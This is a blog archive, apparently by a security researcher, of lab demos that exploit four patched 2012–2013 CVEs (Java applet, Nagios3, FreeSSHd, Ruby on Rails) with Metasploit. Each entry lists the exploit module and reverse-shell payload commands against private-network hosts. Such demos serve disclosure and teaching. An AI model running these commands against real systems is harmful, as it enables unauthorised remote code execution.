Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by kafeine the 2012-11-09
First Metasploit PoC provided the 2012-11-11
Second Metasploit PoC provided the 2013-01-22

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Cool EK : “Hello my friend…”
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time

Affected version(s) :

Oracle Java version 7 Update 7 and earlier.

Tested on Windows 8 Pro with :

Internet Explorer 10
Oracle Java 7 Update 7

Description :

This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-6096 Nagios3 history.cgi Vulnerability Metasploit Demo

Timeline :

Vulnerability reported on Full Disclosure by Aris temp66 the 2012-12-09
PoC provided by blasty the 2013-01-10
Metasploit PoC provided the 2013-01-15

PoC provided by :

Unknown (temp66)
blasty
Jose Selvi
Daniele Martini

Reference(s) :

CVE-2012-6096
OSVDB-88322
BID-56879
Full Disclosure

Affected version(s) :

Nagios 3.4.3 and previous

Tested on Debian 5.0.10 with :

nagios3_3.0.6-4~lenny2_i386.deb

Description :

This module abuses a command injection vulnerability in the Nagios3 history.cgi script. An alert show exist in history.cgi web page.

Commands :

use exploit/unix/webapp/nagios3_history_cgi
set RHOST 192.168.178.44
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2012-6066 Freesshd Authentication Bypass Metasploit Demo

Timeline :

Vulnerability initially discovered by Aris the 2010-08-11
PoC provided by kcope the 2012-12-01
Metasploit PoC provided the 2013-01-13

PoC provided by :

kcope
Aris
Daniele Martini

Reference(s) :

CVE-2012-6066
OSVDB-88006
BID-56785
Full Disclosure 2012
Full Disclosure 2010

Affected version(s) :

Freesshd version 1.2.6 and prior

Tested on Windows XP SP3 with :

Freesshd 1.2.4

Description :

This module exploits a vulnerability found in FreeSSHd 1.2.6 or previous to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.

Commands :

use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.178.22
run

use exploit/windows/ssh/freesshd_authbypass
set RHOST 192.168.178.22
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

getuid
sysinfo

CVE-2013-0156 Ruby on Rails XML Processor YAML Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by numerous people
Coordinated public release of the vulnerability the 2013-01-08
Metasploit PoC provided the 2013-01-09

PoC provided by :

charliesome
espes
lian
hdm

Reference(s) :

CVE-2013-0156
Exploiting Ruby on Rails with Metasploit (CVE-2013-0156)

Affected version(s) :

All versions of RoR (Ruby on Rails) previous versions 3.2.11, 3.1.10, 3.0.19 and 2.3.15

Tested on Centos 6.3 i386 with :

RoR 3.2.10
passenger 3.0.19
GrayLog2 0.9.6

Description :

This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x The technique used by this module requires the target to be running a fairly recent version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be exploitable using the init_with() method, but this has not been demonstrated.

Commands :

use auxiliary/scanner/http/rails_xml_yaml_scanner
set RHOSTS 192.168.21.124
set VHOST rails.zataz.loc
run

use exploit/multi/http/rails_xml_yaml_code_exec
set RHOST 192.168.21.124
set VHOST rails.zataz.loc
set PAYLOAD ruby/shell_reverse_tcp
set LHOST 192.168.21.169
exploit

id
uname -a